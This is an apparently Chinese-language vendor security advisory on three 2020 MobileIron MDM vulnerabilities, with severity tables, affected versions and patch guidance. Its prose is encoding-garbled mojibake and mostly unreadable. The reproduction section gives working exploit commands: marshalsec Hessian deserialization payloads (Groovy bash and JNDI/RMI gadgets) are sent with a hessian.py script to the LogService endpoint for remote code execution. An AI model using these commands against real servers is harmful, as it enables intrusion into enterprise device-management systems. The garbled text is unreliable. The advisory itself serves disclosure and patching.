MobileIron | 11ÔÂMDM¶à¸öÇå¾²Îó²îͨ¸æ

Ðû²¼Ê±¼ä 2020-11-26

0x00 Îó²î¸ÅÊö

²úÆ·Ãû³Æ

CVE ID

Àà ÐÍ

Îó²îÆ·¼¶

Ô¶³ÌʹÓÃ

MobileIron Core &   Connector¡¢Sentry¡¢Monitor and Reporting Database   (RDB)

CVE-2020-15505

RCE

ÑÏÖØ

ÊÇ

MobileIron Core£¦Connector

CVE-2020-15506

Éí·ÝÑéÖ¤Èƹý

ÑÏÖØ

ÊÇ

MobileIron Core

CVE-2020-15507

í§ÒâÎļþ¶ÁÈ¡

¸ßΣ

ÊÇ

 

0x01 Îó²îÏêÇé

 

image.png

 

MobileIronÊÇÈ«ÇòÁìÏÈÇÒÉú³¤×îѸËÙµÄÒƶ¯IT½â¾ö¼Æ»®³§ÉÌÖ®Ò»£¬£¬£¬£¬ÔÚÈ«ÇòÓнü20000¼Ò¹«Ë¾Ê¹ÓÃMobileIronµÄÒƶ¯×°±¸ÖÎÃ÷È·¾ö¼Æ»®£¨MDM£©¡£¡£¡£¡£¡£¡£¡£

2020Äê10ÔÂ22ÈÕ£¬£¬£¬£¬MobileIronÐû²¼¸üÐÂͨ¸æ£¬£¬£¬£¬MDMÖб£´æµÄ¶à¸öÇå¾²Îó²î£¨CVE-2020-15505¡¢CVE-2020-15506ºÍCVE-2020-15507£©ÒÑÔÚ6ÔÂ15ÈÕÐû²¼µÄ²¹¶¡Öб»ÐÞ¸´¡£¡£¡£¡£¡£¡£¡£Îó²îÏêÇéÈçÏ£º 

MobileIronÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¨CVE-2020-15505£©

¸ÃÎó²îÊÇMobileIronÒƶ¯×°±¸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¬£¬£¬£¬ÆäCVSSÆÀ·Ö9.8¡£¡£¡£¡£¡£¡£¡£¹¥»÷Õß¿ÉÒÔʹÓôËÎó²îÖ´ÐÐí§Òâ´úÂë²¢¿ØÖƹ«Ë¾µÄЧÀÍÆ÷¡£¡£¡£¡£¡£¡£¡£

¸ÃÎó²îµÄPoCÒÑÓÚ9ÔÂÔÚGithubÉϱ»Ðû²¼¡£¡£¡£¡£¡£¡£¡£¿ËÈÕ£¬£¬£¬£¬¸ÃÎó²îÕýÔÚ±»APT×éÖ¯ºÍÍøÂç·¸·¨×éÖ¯Æð¾¢ÊµÑéʹÓᣡ£¡£¡£¡£¡£¡£

 

Îó²î¸´ÏÖ£º

Groovy·´ÐòÁл¯Ð¡¹¤¾ß

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "" > exp.ser

python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser

image.png

 

ÍâµØJNDI×¢Èë

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C ""

java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://:1099/> exp

python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

image.png

image.png

 

Ó°Ïì¹æÄ££º

MobileIron Core£¦Connector£º10.3.0.3¼°Ö®Ç°°æ±¾¡¢10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3¡¢10.5.1.0¡¢10.5.2.0¡¢10.6.0.0

Sentry£º9.7.2¼°Ö®Ç°°æ±¾¡¢9.8.0

Monitor and Reporting Database (RDB)£º2.0.0.1¼°Ö®Ç°°æ±¾

 

 

MobileIronÉí·ÝÑéÖ¤ÈƹýÎó²î£¨CVE-2020-15506£©

¸ÃÎó²îÊÇMobileIronÒƶ¯×°±¸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öÉí·ÝÑéÖ¤ÈƹýÎó²î£¬£¬£¬£¬ÆäCVSSÆÀ·Ö9.8¡£¡£¡£¡£¡£¡£¡£¹¥»÷Õß¿ÉʹÓôËÎó²îÈƹýÉí·ÝÑéÖ¤»úÖÆ¡£¡£¡£¡£¡£¡£¡£

Ó°Ïì¹æÄ££º

MobileIron Core£¦Connector£º

10.3.0.3¼°Ö®Ç°°æ±¾

10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3

10.5.1.0¡¢10.5.2.0

10.6.0.0

 

 

MobileIroní§ÒâÎļþ¶ÁÈ¡Îó²î£¨CVE-2020-15507£©

¸ÃÎó²îÊÇMobileIronÒƶ¯×°±¸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öí§ÒâÎļþ¶ÁÈ¡Îó²î£¬£¬£¬£¬ÆäCVSSÆÀ·Ö7.5¡£¡£¡£¡£¡£¡£¡£¹¥»÷Õß¿ÉʹÓôËÎó²î¶ÁÈ¡ÎļþϵͳÖеÄÃô¸ÐÐÅÏ¢¡£¡£¡£¡£¡£¡£¡£

Ó°Ïì¹æÄ££º

MobileIron Core£º

10.3.0.3¼°Ö®Ç°°æ±¾

10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3

10.5.1.0¡¢10.5.2.0

10.6.0.0

 

 

0x02 ´¦Öóͷ£½¨Òé

ÏÖÔÚMobileIronÒѾ­Ðû²¼ÁËÏà¹Ø¸üУ¬£¬£¬£¬½¨Òé²ÎÉý¼¶ÖÁÈçÏ°汾¡£¡£¡£¡£¡£¡£¡£

MobileIron Core & Enterprise Connector£º

v10.3.0.4¡¢v10.4.0.4¡¢v10.5.1.1¡¢v10.5.2.1¡¢v10.6.0.»ò¸ü¸ß°æ±¾¡£¡£¡£¡£¡£¡£¡£

MobileIron Sentry£º

v9.7.3¡¢v9.8.1»ò¸ü¸ß°æ±¾¡£¡£¡£¡£¡£¡£¡£

MobileIron Monitor and Reporting Database (RDB)£º

v2.0.0.2»ò¸ü¸ß°æ±¾¡£¡£¡£¡£¡£¡£¡£

 

²¹¶¡Á´½Ó£º

https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA

 

0x03 ²Î¿¼Á´½Ó

https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

 

0x04 ʱ¼äÏß

2020-07-01  MobileIronÐû²¼Ç徲ͨ¸æ

2020-10-22  MobileIron¸üÐÂÇ徲ͨ¸æ

2020-11-26  VSRCÐû²¼Ç徲ͨ¸æ

 

0x05 ¸½Â¼

 

CVSSÆÀ·Ö±ê×¼¹ÙÍø£ºhttp://www.first.org/cvss/

image.png